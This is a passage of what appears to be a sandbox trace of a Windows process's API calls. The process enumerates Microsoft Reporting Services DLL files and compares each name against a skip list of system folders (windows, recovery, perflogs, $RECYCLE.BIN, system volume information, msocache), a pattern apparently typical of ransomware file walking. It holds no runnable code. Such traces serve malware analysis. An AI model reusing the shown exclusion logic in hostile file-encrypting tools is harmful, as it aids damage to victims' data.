lpString2="msocache") returned -1 [0126.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0126.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d728, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0126.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0126.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dde8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0126.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245338 [0126.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0126.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.465] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9ea37c1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9ea37c1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x70ae0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0126.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dba8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0126.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245338 | out: hHeap=0x1e0000) returned 1 [0126.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.465] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7ca9e76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7ca9e76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf803d796, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15088, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MI5C38~1.DLL")) returned 1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0126.465] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0126.466] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.466] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.466] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0126.466] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0126.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224cc8 [0126.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20dde8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224cc8 | out: hHeap=0x1e0000) returned 1 [0126.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d578, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0126.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.466] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb6ed802, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb6ed802, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb713a45, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xaae0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0126.466] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0126.466] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0126.466] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0126.466] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0126.466] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0126.466] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0126.466] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0126.466] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.466] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0126.466] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0126.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0126.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0126.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0126.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0126.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0126.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.467] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf2616676, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf2616676, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf2f2d53e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3ae8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.467] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0126.467] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0126.467] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0126.467] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0126.467] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0126.467] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0126.467] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0126.467] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.467] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0126.467] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0126.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0126.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d920, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0126.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0126.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d578, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0126.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e228 [0126.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0126.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.468] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf45f9db0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf45f9db0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0126.468] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0126.468] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0126.468] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0126.468] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0126.468] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0126.468] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0126.468] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0126.468] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.468] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0126.468] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0126.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0126.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0126.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0126.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0126.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0126.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.468] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6c46ba0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c46ba0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c46ba0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e68, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.468] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0126.468] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0126.468] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0126.468] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0126.468] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0126.468] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0126.469] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0126.469] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.469] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0126.469] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0126.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0126.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0126.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0126.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0126.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1ef7e0 [0126.469] HeapFree (in: 